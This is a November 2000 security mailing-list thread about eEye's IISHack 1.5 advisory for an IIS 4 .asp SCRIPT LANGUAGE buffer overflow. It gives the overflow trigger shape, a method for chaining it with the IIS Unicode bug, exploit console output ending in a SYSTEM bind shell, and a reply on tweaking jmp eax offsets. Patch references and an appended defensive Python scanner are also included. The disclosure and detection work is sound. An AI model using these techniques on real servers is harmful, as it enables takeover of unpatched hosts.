Penetration Testing mailing list archives

Re: [PEN-TEST] IIS ASP $19.95 hack - IISHack 1.5


From: Marc Maiffret <marc () EEYE COM>
Date: Sun, 5 Nov 2000 10:36:51 -0800

The reason this is happening is because we use a jmp eax from our ole32.dll
version. Your ole32.dll is probably different, therefore your jmp eax is
going to be different, and if it is different then you're not going to be able
to jump back into the exploit code and will therefore jmp to random memory and
crash.

So you're vulnerable, as you already know; it's just a matter of tweaking the
exploit a bit, like maybe finding a better jmp eax in a dll that is static
throughout more NT4+IIS4 versions.

Note for whoever: So once again, if iishack1.5 is causing your server to
crash then you're vulnerable; you just need to tweak some offsets to make the
exploit work correctly. View the iishack1.5 source code and go from there.
We might release another version with a better jmp eax location, however
this was for proof of concept, not really to hold people's hands in breaking
servers.

Let me know if you run into any more technical problems.

Signed,
Marc Maiffret
Chief Hacking Officer
eCompany / eEye
T.949.349.9062
F.949.349.9538
http://eEye.com

|-----Original Message-----
|From: Loschiavo, Dave [mailto:DLoschiavo () frcc cc ca us]
|Sent: Sunday, November 05, 2000 6:12 AM
|To: 'Marc Maiffret '; 'PEN-TEST () SECURITYFOCUS COM '
|Subject: RE: [PEN-TEST] IIS ASP $19.95 hack - IISHack 1.5
|
|
|I am testing this on an IIS 4 box, SP6a no hotfixes, RDS vulnerable, and it
|crashes the www publishing service.
|
|Output is pasted below, as you can see it does appear to run, and the
|exploit asp file is present in the scripts directory, however there is no
|way to connect to the box once the www service crashes.
|
|Also, if I restart the service, leave the exploit in place and then send a
|request through my browser (http://192.168.1.250/scripts/eeyerulez.asp), I
|again crash the service.
|
|From what I have seen, it works as a DoS, but in this configuration, is not
|something that currently works as an exploit to gain access to the box.
|Anyone else get better results?
|
|[paste]
|E:\Program Files\Sploits\iishack1_5>iishack1.5 192.168.1.250 80 6969
|IISHack Version 1.5
|eEye Digital Security
|http://www.eEye.com
|Code By: Ryan Permeh & Marc Maiffret
|eEye Digital Security takes no responsibility for use of this code.
|It is for educational purposes only.
|
|Attempting to find an executable directory...
|Trying directory [scripts]
|Executable directory found. [scripts]
|Path to executable directory is [C:\Inetpub\scripts]
|Moving cmd.exe from winnt\system32 to C:\Inetpub\scripts.
|Succesfully moved cmd.exe to C:\Inetpub\scripts\eeyehack.exeSending the
|exploit...
|Exploit sent! Now telnet to 192.168.1.250 on port 6969 and you should get a
|cmd
|prompt.
|
|
|-----Original Message-----
|From: Marc Maiffret
|To: PEN-TEST () SECURITYFOCUS COM
|Sent: 11/3/00 6:16 AM
|Subject: [PEN-TEST] IIS ASP $19.95 hack - IISHack 1.5
|
|I know there are not normally advisories here but we thought this might be
|something worthwhile for your toolkits.
|
|-----
|IIS ASP $19.95 hack - IISHack 1.5
|
|Release Date:
|November 3rd, 2000
|
|Systems Affected:
|Windows NT 4.0 IIS 4.0 sp6 (vulnerable)
|Windows NT 5.0 IIS 5.0 (not vulnerable)
|
|Description:
|There exists a buffer overflow, that can be exploited to gain SYSTEM level
|access, within the IIS (Internet Information Server) .ASP ISAPI file parsing
|mechanism.
|
|This is not a remote exploit, it is a local one (However, we will explain
|later in the advisory how you _could_ pull this exploit off remotely.). It
|is local in the sense that you need to actually create an "evil" .asp file
|that when parsed by IIS will cause inetinfo.exe to buffer overflow and
|therefore allow you to take control of the local server as SYSTEM.
|
|So who is affected by this? Any web hosting company or internet service
|provider that is running multiple clients within the same NT4 IIS 4 web
|server. Basically any client (or attacker) who can update their website,
|i.e. upload a new default.asp or anything.asp, can then execute code as
|SYSTEM and therefore take complete control of your server. They could then
|do whatever they want to any of the other client websites hosted on that NT4
|server. On the other hand they could install sniffers or crack passwords to
|further their control of your network.
|
|Hence the title $19.95 hack... Anyone with $20 dollars to spend can
|potentially break into any web hosting company or internet service provider
|running NT4+IIS4. Simply buy an account with a web hosting company, upload
|your evil.asp and request that evil.asp from your website, I.E.
|http://www.badguy.com/evil.asp, and you're executing code on that server as
|SYSTEM.
|
|Here is an example .asp file that will cause NT4+IIS4's inetinfo.exe to
|overflow.
|
|----start-cut-of-example.asp----
|<SCRIPT LANGUAGE="[buffer]" RUNAT="Server">
|</SCRIPT>
|----end-cut-of-example.asp----
|
|Where [buffer] is 2220 characters or more. Yes, this overflow is
|exploitable. See section below.
|
|So you don't have $20 dollars to spend, or a server does not host websites?
|What then? Well there are going to be situations when a remote attack is
|possible.
|
|An example situation would be a server that has a guest book/message board
|system that does not strip out SCRIPT comments when it writes to its
|returned .asp file. So an attacker could go to a web board and within the
|"Enter your message here:" box (or whatever) they could simply paste in the
|contents of the script language overflow and submit the message. Then once
|they requested the .asp file that has that message (the embedded overflow
|msg) it would cause IIS to parse that .asp file, overflow, and execute their
|code.
|
|On another note you could couple this attack with the recent IIS Unicode bug
|to use cmd.exe to echo the contents of your evil.asp to the remote system
|then when you request evil.asp your code is executed as SYSTEM. In fact, we
|have created a sample exploit to show how this .asp language overflow and
|the IIS Unicode exploit could be used together to remotely compromise any
|NT4+IIS4+SP6(or lower) system that is behind in installing hot fixes.
|
|Due to the nature of this attack it is likely and quite possible that
|firewalls will not protect you against attacks like this.
|
|The Exploit:
|How to remotely exploit a system? Use the IIS Unicode exploit + .asp
|language overflow.
|For those of you not familiar with the IIS Unicode exploit, it basically
|allows you to remotely execute commands against IIS as IUSR_MACHINE. Now
|since we can execute commands via cmd.exe we could try to make the remote
|web server connect out to an FTP server to grab a file (sort of like the
|first IISHack) but you would still be executing code as IUSR_MACHINE. The
|way our exploit works is by using the Unicode bug to echo our .asp file
|(complete with shell code, to bind cmd.exe to a port ;-]) to a remote server
|and then request that .asp file which then causes inetinfo.exe to overflow
|resulting in a SYSTEM privileged cmd.exe to be bound to a specified port.
|Now, in most circumstances you should have correct ACLs on cmd.exe (that
|would not allow IUSR_MACHINE to touch it) as well as some other security
|precautions in place, so we understand this exploit will not work on a
|secured system. However, this is just proof of concept and as most of us
|know, most IIS servers do not have proper local security in place. The
|exploit basically looks like the following when compiled:
|
|C:\we are still hiring good programmers> iishack1.5.exe
|IISHack Version 1.5
|eEye Digital Security
|http://www.eEye.com
|Code By: Ryan Permeh & Marc Maiffret
|eEye Digital Security takes no responsibility for use of this code.
|It is for educational purposes only.
|
|Usage: IISHack1.5 [server] [server-port] [trojan-port]
|
|C:\send resume to hire () eeye com> iishack1.5.exe www.[yourowncompany].com
|80
|6969
|IISHack Version 1.5
|eEye Digital Security
|http://www.eEye.com
|Code By: Ryan Permeh & Marc Maiffret
|eEye Digital Security takes no responsibility for use of this code.
|It is for educational purposes only.
|
|Attempting to find an executable directory...
|Trying directory [scripts]
|Executable directory found. [scripts]
|Path to executable directory is [C:\Inetpub\scripts]
|Moving cmd.exe from winnt\system32 to C:\Inetpub\scripts.
|Successfully moved cmd.exe to C:\Inetpub\scripts\eeyehack.exe
|Sending the exploit...
|Exploit sent! Now telnet to www.[yourowncompany].com on port 6969 and
|you
|should get a cmd prompt.
|C:\> telnet www.[yourowncompany].com 6969
|Trying www.[yourowncompany].com...
|Microsoft(R) Windows NT(TM)
|(C) Copyright 1985-1996 Microsoft Corp.
|
|C:\WINNT\system32>whoami
|NT AUTHORITY\SYSTEM
|
|Download the full exploit from:
|http://www.eEye.com/html/advisories/IISHack1.5.zip
|
|Vendor Status:
|Microsoft has already fixed this .asp language overflow in prior hot fixes
|and applied it to most post service pack 6 hot fixes. This flaw has been
|fixed in the latest versions of W3SVC.DLL. Installing any recent hotfix will
|fix the problem.
|Here is a list of _some_ MS advisories and hotfixes that will fix the .asp
|language overflow vulnerability:
|MS00-080: Patch Available for "Session ID Cookie Marking" Vulnerability
|MS00-060: Patch Available for "IIS Cross-Site Scripting" Vulnerabilities
|MS00-057: Patch Available for "File Permission Canonicalization" Vulnerability
|MS00-030: Patch Available for "Malformed Extension Data in URL" Vulnerability
|MS00-023: Patch Available for "Myriad Escaped Characters" Vulnerability
|MS00-019: Patch Available for "Virtualized UNC Share" Vulnerability
|MS00-018: Patch Available for "Chunked Encoding Post" Vulnerability
|
|W3SVC versions greater than 720 address this issue. So if you've been
|keeping up to date with your hot fixes then you should not be vulnerable to
|this issue.
|
|Copyright (c) 1998-2000 eEye Digital Security
|Permission is hereby granted for the redistribution of this alert
|electronically. It is not to be edited in any way without express consent of
|eEye. If you wish to reprint the whole or any part of this alert in any
|other medium excluding electronic medium, please e-mail alert () eEye com for
|permission.
|
|Disclaimer
|The information within this paper may change without notice. Use of this
|information constitutes acceptance for use in an AS IS condition. There are
|NO warranties with regard to this information. In no event shall the author
|be liable for any damages whatsoever arising out of or in connection with
|the use or spread of this information. Any use of this information is at the
|user's own risk.
|
|Feedback
|Please send suggestions, updates, and comments to:
|
|eEye Digital Security
|mail:info () eEye com
|http://www.eEye.com
|
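
Added defender-side example, not part of this thread or of the eEye tool: a scanner for uploaded or generated .asp content that flags the oversized SCRIPT LANGUAGE attribute the advisory describes, so a shared host or a message board that writes user input into .asp files can reject it before IIS parses it. The 2220-character threshold is the one quoted in the advisory; the sample file contents and names are constructed.

```python
import re
from typing import Dict, List

# Threshold quoted in the eEye advisory: a SCRIPT LANGUAGE value of 2220 or more
# characters overflows the .asp parser on unpatched NT4 + IIS 4 SP6.
LANGUAGE_OVERFLOW_LEN = 2220

# Opening <SCRIPT ...> tag, any case, attributes in any order. Assumes attribute
# values do not themselves contain '>' (true for the advisory's example shape).
_SCRIPT_TAG = re.compile(r"<\s*script\b([^>]*)>", re.IGNORECASE | re.DOTALL)
# name="value", name='value' or name=value
_ATTR = re.compile(r"""(\w+)\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s"'>]+))""",
                   re.IGNORECASE | re.DOTALL)


def parse_attrs(raw: str) -> Dict[str, str]:
    """Map lower-cased attribute names to values for one tag's attribute text."""
    attrs: Dict[str, str] = {}
    for m in _ATTR.finditer(raw):
        value = next(g for g in m.groups()[1:] if g is not None)
        attrs[m.group(1).lower()] = value
    return attrs


def scan_asp(source: str, threshold: int = LANGUAGE_OVERFLOW_LEN) -> List[Dict[str, object]]:
    """Return one finding per SCRIPT tag whose LANGUAGE attribute is long enough to
    trigger the overflow; use it to reject uploads or audit board-generated .asp."""
    findings: List[Dict[str, object]] = []
    for m in _SCRIPT_TAG.finditer(source):
        attrs = parse_attrs(m.group(1))
        lang_len = len(attrs.get("language", ""))
        if lang_len >= threshold:
            findings.append({
                "offset": m.start(),  # where the offending tag begins in the file
                "language_len": lang_len,
                "runat_server": attrs.get("runat", "").lower() == "server",
            })
    return findings


# Constructed samples (not taken from the advisory's exploit): a normal server-side
# script block, and a page carrying an oversized LANGUAGE attribute.
BENIGN_ASP = ('<%@ LANGUAGE="VBScript" %>\n'
              '<SCRIPT LANGUAGE="VBScript" RUNAT="Server">\n'
              'Response.Write "hello"\n</SCRIPT>\n')
OVERSIZED_ASP = ('<html>\n<script runat=\'Server\' language="' + "A" * 2220 + '">\n'
                 '</script>\n</html>\n')

if __name__ == "__main__":
    for name, body in (("benign.asp", BENIGN_ASP), ("upload.asp", OVERSIZED_ASP)):
        print(name, scan_asp(body) or "clean")
```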

